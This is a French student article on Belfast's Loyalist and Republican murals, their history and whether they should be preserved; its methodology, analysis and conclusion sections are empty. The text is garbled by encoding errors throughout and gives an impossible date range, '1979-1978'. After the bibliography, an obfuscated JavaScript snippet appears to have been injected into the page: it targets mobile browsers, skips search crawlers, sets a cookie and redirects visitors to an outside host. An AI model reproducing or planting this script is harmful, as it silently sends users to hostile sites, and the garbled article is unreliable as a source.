Entre prA�servation et destruction: la place des murals de Belfast

Par Assmaa Shaban, Estelle Pannatier, Laura Perez &A�Sophie CompagnonA�

La��art a souvent une dimension contestataire et il est frA�quent que des artistes prennent position pour des causes qui leur sont chA?res. Mais dans certains cas, la��art peut devenir le dernier moyen d’expression des individus ou des populations lorsque ceux-ci n’ont plus d’autres moyens de communiquer leurs revendications. Ca��est le cas notamment en Irlande du Nord, oA? la��art, sous la forme des murals, est devenu une vA�ritable arme durant le conflit qui a opposA� les Loyalistes et les RA�publicains durant le 20e siA?cle.

A Belfast, les premiA?res fresques loyalistes sont apparues au dA�but du 20e siA?cle et comme le rappelle B. Rolston, elles A�taient peintes A� la��origine durant les festivitA�s qui commA�moraient la bataille de Boyne du 12 juillet 1690 (Rolston B., 1992, p.1). La population protestante profitait de cette opportunitA� pour rA�affirmer sa loyautA� A� la Couronne da��Angleterre et sa suprA�matie sur la population de confession catholique (Tosser R., 2009, p.5). Ainsi, selon P. PragnA?re, a�?tout en revendiquant unionisme et loyalisme envers la Grande-Bretagne, ces peintures A�taient dA�jA� le symbole da��une affirmation de propriA�tA� sur la��espace public et sur la��espace proprement dita�? (PragnA?re P., 2009, p.3). Da��aprA?s N. Jarman, les fresques loyalistes reprA�sentaient en gA�nA�ral des thA?mes hA�ritA�s de la tradition da��Orange ou des groupes paramilitaires (Jarman N., 2001).

Les murals rA�publicains sont apparus plus tardivement. En effet, ce na��est qua��A� partir du dA�veloppement violent du conflit que cette pratique se rA�pand chez les RA�publicains. Ils traduisaient un rA�A�quilibrage des rapports de forces entre RA�publicains et Loyalistes et a�?constituaient une rA�ponse symbolique A� la domination protestantea�? (PragnA?re P., 2009, p.3). Ca��est dans la pA�riode 1979-1978, aprA?s la mort de Bobby Sands, premier grA�viste de la faim, que sa��est rA�pandue A� grande A�chelle la peinture de murals rA�publicains (Tosser R., p.5). Ceux-ci A�taient peints en soutien au mouvement de protestation des prisonniers rA�publicains qui rA�clamaient le maintien de leurs statut de prisonniers politiques (PragnA?re P., 2009, p.4). Les thA?mes de ces fresques sa��inspiraient donc de la rA�sistance du parti rA�publicain Sinn FA�in et de la��IRA, le principal groupe paramilitaire rA�publicain. AprA?s le cessez-le-feu de 1994, lorsque Sinn FA�in cherchait A� lA�gitimer son existence en tant que parti politique officiel, les peintres rA�publicains ont commencA� A� remplacer les anciens thA?mes par des sujets liA�s A� la communautA� culturelle nationaliste, irlandaise ou encore celtique (Jarman N., 2001, p.9-10).

Au fil du temps, de plus en plus da��auteurs de fresques ont commencA� A� reprA�senter des sujets internationaux. Ainsi, sur la��International Wall, des fresques sa��inspirant d’A�vA?nements qui ont lieu dans da��autres parties du monde sont rA�guliA?rement peintes. AprA?s la��accord dit du a�?Vendredi Sainta�? signA� en avril 1998, les murals A� caractA?re militaire ont peu A� peu laissA� la place A� de nouveaux thA?mes. Ceux-ci retracent notamment des moments forts de la��histoire des quartiers de la ville comme la��univers du livre Narnia, dont la��auteur C.S. Lewis est nA� A� Belfast, ou le Titanic qui a A�tA� construit dans la ville. En effet, comme la��A�voque le film a�?The Art of Conflicta�?, rA�alisA� par V. Vaughn en 2012, de nouvelles reprA�sentations voient le jour sur les murs de certains quartiers, dans le but de fA�dA�rer les deux communautA�s et de crA�er une sociA�tA� en paix.

Les murals sont ainsi devenus, selon N. Jarman a�?la��indice visuel le plus reprA�sentatif des troubles, et la��icA?ne par excellence du Belfast contemporaina�? (Jarman N., 2001, p.8). Durant le conflit, ces fresques ont A�tA� le vecteur de diffusion da��un sentiment identitaire qui a conduit au renforcement du communautarisme (Jarman N., 2001, p.8). Mais si la��art a A�tA� utilisA� comme arme par les deux parties durant le conflit, la place de ces fresques, A� caractA?re violent parfois, est aujourda��hui remise en question dans le contexte du processus de paix. Les autoritA�s et les communautA�s locales doivent en effet dA�cider si elles entendent prA�server ou dA�truire cet hA�ritage controversA�.

Parmi la multitude da��approches envisageables, nous avons choisi de baser notre dA�marche sur la perception de cette problA�matique par les habitants. En effet, selon nous, la comprA�hension du ressenti de la population est fondamentale pour la��A�laboration de solutions durables. Ainsi, lors de notre voyage da��A�tude A� Belfast, nous avons cherchA� A� interroger des habitants afin de comprendre comment la violence symbolique qui sa��exprime au travers des murals hA�ritA�s des troubles est vA�cue par les Belfastois. Nous avons A�galement tentA� de saisir quelle A�tait la place que les habitants attribuent aujourda��hui A�A� ces fresques et comment ils envisagent la��avenir des murals.

Nos hypothA?ses de travail ont A�tA� les suivantes:

  • Les Belfastois sont encore profondA�ment touchA�s par la prA�sence de ces murals
  • Les murals ont une place encore importante dans la vie des Belfastois qui ne souhaitent par consA�quent pas voir les fresques dA�truites.

MA�thodologie

Analyse des donnA�es

Conclusion

Bibliographie

Jarman N., 2001, a�?Fragments et strates : DA�cryptage de la gA�ographie sectaire de Belfasta�? in Bromberger Ch., Morel A. (ed.) Limites floues,frontiA?res vives : Des variations culturelles en France et en Europe, Paris, A�ditions de la Maison des sciences de la��homme.

Mourlon F., 2012, a�?Official Responses to Dealing with the Past in Northern Ireland: Between Remembering and Forgetting a�?, E-rea, 10.1.

PragnA?re P., 2009, a�?Peintures murales en Irlande du Nord et au Pays basque : mobilisation populaire et crA�ation da��identitA� nationalea�?, Les Cahiers du MIMMOC, nA�5.

Roston B., 1992, Drawing support: murals in the North of Ireland, Belfast, Beyong the Pale Publications.

Tosser R., 2009, a�?Fresques et marches orangistesa�?, Les Cahiers du MIMMOC, nA�5.

Vaughn V., 2012 a�?Art of conflicta�? [Film documentaire].

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}


Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Ce site utilise Akismet pour réduire les indésirables. En savoir plus sur comment les données de vos commentaires sont utilisées.